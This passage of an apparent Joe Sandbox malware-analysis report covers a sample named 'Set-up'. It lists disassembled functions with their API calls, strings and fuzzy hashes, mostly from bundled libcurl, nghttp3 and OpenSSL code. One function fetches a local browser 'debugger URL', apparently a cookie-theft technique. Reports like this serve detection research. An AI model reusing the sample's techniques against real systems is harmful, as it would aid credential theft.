Instruction Fuzzy Hash: 6DE1D675B00301ABD714AB14DC4AF6A7FD4BF91704F184969FC08AB3E2EAB2E854C791

Function 00534720 Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 426stringCOMMON

Download Yara Rule

APIs

memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000040,?), ref: 00534749
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005D), ref: 005348E5
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 0053491B
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00534963
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,0000000A), ref: 00534971
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0053497B

Part of subcall function 005306F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00535663,?), ref: 005306F9

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00534A41
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000), ref: 00534A63
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00534A6D
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00534AE0
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00534AEA
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00534B28
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00534B34
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00534B76
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00534B80

Strings

%u.%u.%u.%u, xrefs: 00534C00
urlapi.c, xrefs: 005347B9, 005347CC, 005347E2, 0053482C, 00534856, 00534879, 005349A6
%ld, xrefs: 005349BC

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _errno$strtoul$strchr$memchrstrlen
String ID: %ld$%u.%u.%u.%u$urlapi.c
API String ID: 102816355-2423153182
Opcode ID: 1fa33e33e5d80d7d089b9dcff694bae4b2bcee4c3e19876b146684e4a0f45b37
Instruction ID: 4809ac5442cc82d1788f9e94f0db71c756e8eb3cb7d6f979dab899d3e3b089c9
Opcode Fuzzy Hash: 1fa33e33e5d80d7d089b9dcff694bae4b2bcee4c3e19876b146684e4a0f45b37
Instruction Fuzzy Hash: 14D146B1908306ABEB106B24DC56B7F7FD9BF91344F094438F88597282F735AD548BA2

Function 005408C2 Relevance: 28.3, APIs: 4, Strings: 12, Instructions: 295stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0054090A
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 00540979

Strings

vssh/libssh2.c, xrefs: 005409BD, 005409DE, 00542AB9, 00542ADA, 005432C1, 005432E2, 00543BBA, 00543BDC, 00544746, 0054476C
incorrect date format for %.*s, xrefs: 00544738
Syntax error: chmod permissions not a number, xrefs: 00542AFC
chgrp, xrefs: 00540959
atime, xrefs: 00543F47, 00544856
Attempt to get SFTP stats failed: %s, xrefs: 00543C06
chmod, xrefs: 005408E2, 00542A66
mtime, xrefs: 00543F5B
date overflow, xrefs: 00543F94
chown, xrefs: 0054325D
Syntax error: chgrp gid not a number, xrefs: 00540A00
Syntax error: chown uid not a number, xrefs: 00543304

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strlenstrtoul
String ID: Attempt to get SFTP stats failed: %s$Syntax error: chgrp gid not a number$Syntax error: chmod permissions not a number$Syntax error: chown uid not a number$atime$chgrp$chmod$chown$date overflow$incorrect date format for %.*s$mtime$vssh/libssh2.c
API String ID: 4005410869-1121828786
Opcode ID: 48e328fd10143b8f9234257ce8319aec961fc0c63eeae457b287fe7ac80311a6
Instruction ID: 3039018e4d02eb3e1fc5cb748cf734a990136fe098abf2bcfb87498133240bba
Opcode Fuzzy Hash: 48e328fd10143b8f9234257ce8319aec961fc0c63eeae457b287fe7ac80311a6
Instruction Fuzzy Hash: CCB11870B44701AFE3119F24DC46B5ABFE6BF85718F044968FA486B3D2E771A914CB82

Function 0058C350 Relevance: 28.2, APIs: 3, Strings: 13, Instructions: 166stringnetworkCOMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unknown,00000100), ref: 0058C37A
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,Unknown error), ref: 0058C476
WSAGetLastError.WS2_32 ref: 0058C4AE

Strings

Unknown error, xrefs: 0058C468, 0058C474
r, xrefs: 0058C561
SSL_ERROR unknown, xrefs: 0058C502, 0058C524
QUIC connect: %s in connection to %s:%d (%s), xrefs: 0058C525
No error, xrefs: 0058C463
SSL_ERROR_SYSCALL, xrefs: 0058C4F5
SSL certificate problem: %s, xrefs: 0058C420
erro, xrefs: 0058C568
SSL certificate verification failed, xrefs: 0058C582
unknown, xrefs: 0058C374
own , xrefs: 0058C570
Unkn, xrefs: 0058C578
QUIC connection has been shut down, xrefs: 0058C3D1

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: ErrorLastmemcpystrcpy
String ID: No error$QUIC connect: %s in connection to %s:%d (%s)$QUIC connection has been shut down$SSL certificate problem: %s$SSL certificate verification failed$SSL_ERROR unknown$SSL_ERROR_SYSCALL$Unkn$Unknown error$erro$own $r$unknown
API String ID: 31095072-3036451936
Opcode ID: da01eb6d599e7ca00da5083e1e13898e52bb8d600c91855fc0315061e6d9237d
Instruction ID: deb3461d8b3d849de4e7d96e43aef2d0745916a968fa051bc1961d034d6d4c9d
Opcode Fuzzy Hash: da01eb6d599e7ca00da5083e1e13898e52bb8d600c91855fc0315061e6d9237d
Instruction Fuzzy Hash: FA511BB29083409BDB20BA54DC45B6FBFD4FFD1304F14886DFD84AB292E675D9848B62

Function 005725D0 Relevance: 19.8, APIs: 1, Strings: 12, Instructions: 295COMMON

Download Yara Rule

Strings

STAR, xrefs: 0057283C
PREAUTH connection, already authenticated, xrefs: 00572770
SASL, xrefs: 00572892
STARTTLS not available., xrefs: 00573094
AUTH, xrefs: 005728C5
STARTTLS denied, xrefs: 00573068
L-IR, xrefs: 0057289C
TTLS, xrefs: 00572846
Got unexpected imap-server response, xrefs: 00573034
CAPABILITY, xrefs: 00572797
STARTTLS, xrefs: 00572D47
LOGINDISABLED, xrefs: 00572867

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID: AUTH$CAPABILITY$Got unexpected imap-server response$L-IR$LOGINDISABLED$PREAUTH connection, already authenticated$SASL$STAR$STARTTLS$STARTTLS denied$STARTTLS not available.$TTLS
API String ID: 0-3171374047
Opcode ID: 337af62ee73647b20b7e7b9696c3cb815ebc5da2438bf7a4269d648b6a5a9877
Instruction ID: 31af2ddc19f7436755b73b8a45145245592649f6ef8045778f47e19eec2ea14a
Opcode Fuzzy Hash: 337af62ee73647b20b7e7b9696c3cb815ebc5da2438bf7a4269d648b6a5a9877
Instruction Fuzzy Hash: B8B17CB09043019BDB119B24E889B7A7FA4BF95714F14C56AE85D47382EB319E84F782

Function 005120AD Relevance: 19.6, APIs: 3, Strings: 10, Instructions: 142COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005120D4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005122D0

Strings

Attempt %d failed: %s, xrefs: 0051229F
Q, xrefs: 00512213
All %d attempts to fetch debugger URL failed., xrefs: 005122EF
@, xrefs: 005121F2
Failed to allocate memory for response., xrefs: 005120F1
+N, xrefs: 005121B1
http://localhost:%d/json, xrefs: 00512170
GET request succeeded on attempt %d., xrefs: 0051225D
Failed to initialize curl., xrefs: 0051213F
d, xrefs: 00512178

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: freemalloc
String ID: +N$@$All %d attempts to fetch debugger URL failed.$Attempt %d failed: %s$Failed to allocate memory for response.$Failed to initialize curl.$GET request succeeded on attempt %d.$Q$d$http://localhost:%d/json
API String ID: 3061335427-1249806554
Opcode ID: 6ca27628dcfd5e7b819f92d25b76020a18737f35a5b74c27295bc1dce67e78ae
Instruction ID: e3befa2eca1d230fd2723ff3515708a84f39845142e7269333dc556107b27d37
Opcode Fuzzy Hash: 6ca27628dcfd5e7b819f92d25b76020a18737f35a5b74c27295bc1dce67e78ae
Instruction Fuzzy Hash: 656171B49087099FDB00EFA8D4897AEBFF0BF84314F118819E598A7341D7799984CF96

Function 005B4920 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 162COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 005B499C
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!conn->server,nghttp3_conn.c,00000A08), ref: 005B4A0A
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(conn->server,nghttp3_conn.c,00000A2B,?), ref: 005B4A8E
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri->urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,00000A2C), ref: 005B4AA3
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri->inc == 0 || pri->inc == 1,nghttp3_conn.c,00000A2D), ref: 005B4AB8
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(conn->server,nghttp3_conn.c,00000A3E,?), ref: 005B4B1A

Strings

!conn->server, xrefs: 005B4A05
pri->urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 005B4A9E
conn->server, xrefs: 005B4A89, 005B4B15
pri->inc == 0 || pri->inc == 1, xrefs: 005B4AB3
nghttp3_conn.c, xrefs: 005B4A00, 005B4A84, 005B4A99, 005B4AAE, 005B4B10

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _assert$memcpy
String ID: !conn->server$conn->server$nghttp3_conn.c$pri->inc == 0 || pri->inc == 1$pri->urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 3718630003-1169204258
Opcode ID: d1a895abe17ad6d3adca2c818b709f6d0a312da31e217520d25c4754bcd5d76a
Instruction ID: da9a3ac007c0384e4c2b71adf888ccec0bfbb2cac0ddef533b6375656d9e75b2
Opcode Fuzzy Hash: d1a895abe17ad6d3adca2c818b709f6d0a312da31e217520d25c4754bcd5d76a
Instruction Fuzzy Hash: 37512771A40705AFD7209E28DC45BEB7BEAFF8A354F044529F955821D2E770F980CBA2

Function 006C4580 Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 159stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00588C0E,?), ref: 006C45E3
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dynamic,?,?,00588C0E,?), ref: 006C460A

Strings

/data/curl-i686/lib/engines-3, xrefs: 006C462B, 006C4682
ENGINE_by_id, xrefs: 006C46D5, 006C46FA, 006C4746
DIR_LOAD, xrefs: 006C466A
crypto/engine/eng_list.c, xrefs: 006C46DF, 006C4704, 006C4750
OPENSSL_ENGINES, xrefs: 006C461C
LOAD, xrefs: 006C46BA
dynamic, xrefs: 006C4604, 006C4633
id=%s, xrefs: 006C475E
DIR_ADD, xrefs: 006C4683
LIST_ADD, xrefs: 006C46A0

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strcmp
String ID: /data/curl-i686/lib/engines-3$DIR_ADD$DIR_LOAD$ENGINE_by_id$LIST_ADD$LOAD$OPENSSL_ENGINES$crypto/engine/eng_list.c$dynamic$id=%s
API String ID: 1004003707-1524119518
Opcode ID: de4a18e0f306149fd3f0a67a8fca649639da40b6ba5a4d2f449d6503e9fe56a3
Instruction ID: 11f8d6940660173aba54a76480a394aab87893ed18cd76a9efd37661be82e706
Opcode Fuzzy Hash: de4a18e0f306149fd3f0a67a8fca649639da40b6ba5a4d2f449d6503e9fe56a3
Instruction Fuzzy Hash: DE41F275B817106AE670B2642D67FBA319ACB12B44F09006CFE04A63D3FF99D91081BB

Function 00576810 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 344stringCOMMON

Download Yara Rule

APIs

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000005D), ref: 00576884
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 005768AC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 005768C1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00576973
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F), ref: 00576983
atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001), ref: 00576995

Strings

[, xrefs: 005769E1

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memcpystrchr$atoistrlen
String ID: [
API String ID: 444251876-784033777
Opcode ID: c2ab50610cc51b6fd7448d6e2694522c61d19a1f8d2f8fed155cc04ee1c59147
Instruction ID: 0a2c3a84ef9c3789c575313a2e47d31461a6cbab905283c82755fcbe0c3cf777
Opcode Fuzzy Hash: c2ab50610cc51b6fd7448d6e2694522c61d19a1f8d2f8fed155cc04ee1c59147
Instruction Fuzzy Hash: 8AB16971508B925BDB3A9A25B89073A7FD8FB56304F18C92DE8CDC6181EB25CC44B753

Function 005163F0 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 255fileCOMMON

Download Yara Rule

APIs

fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.,0000006F,00000001,?), ref: 00516467

Strings

mite, xrefs: 00516688
%d%02d%02d %02d:%02d:%02d, xrefs: 005166D5
%s%s "%d%02d%02d %02d:%02d:%02d", xrefs: 00516540
hsts.c, xrefs: 0051656B, 005165CF
%s%s "%s", xrefs: 005164AA
unlimited, xrefs: 005164A1
# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00516462

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: fwrite
String ID: # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.$%d%02d%02d %02d:%02d:%02d$%s%s "%d%02d%02d %02d:%02d:%02d"$%s%s "%s"$hsts.c$mite$unlimited
API String ID: 3559309478-3911685517
Opcode ID: 825ccf7392a155835207bd61eaaaa3a41b43d60caa7b30534b4cc881e3921522
Instruction ID: e4ca3d94f9face585fec2c21d0bc1b5d5eba09f327b71b0d458c0e2d97600013
Opcode Fuzzy Hash: 825ccf7392a155835207bd61eaaaa3a41b43d60caa7b30534b4cc881e3921522
Instruction Fuzzy Hash: B981E7B1A04701ABF710DA24DC45BAB7AE5BFD8714F08492CF94987292E731DD91CB92

Function 005B6210 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 184COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(stream->outq_idx + 1 >= npopped,nghttp3_stream.c,000003CE,?,00000000,0058DB9C,?,005B3BB8,00000000,?,?), ref: 005B6433

Strings

chunk->end == tbuf->buf.end, xrefs: 005B649B
stream_pop_outq_entry, xrefs: 005B647D
nghttp3_stream.c, xrefs: 005B6429, 005B6487, 005B6496, 005B64AB, 005B64C0
nghttp3_ringbuf_len(chunks), xrefs: 005B64B0
stream->outq_idx + 1 >= npopped, xrefs: 005B642E
chunk->begin == tbuf->buf.begin, xrefs: 005B64C5

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

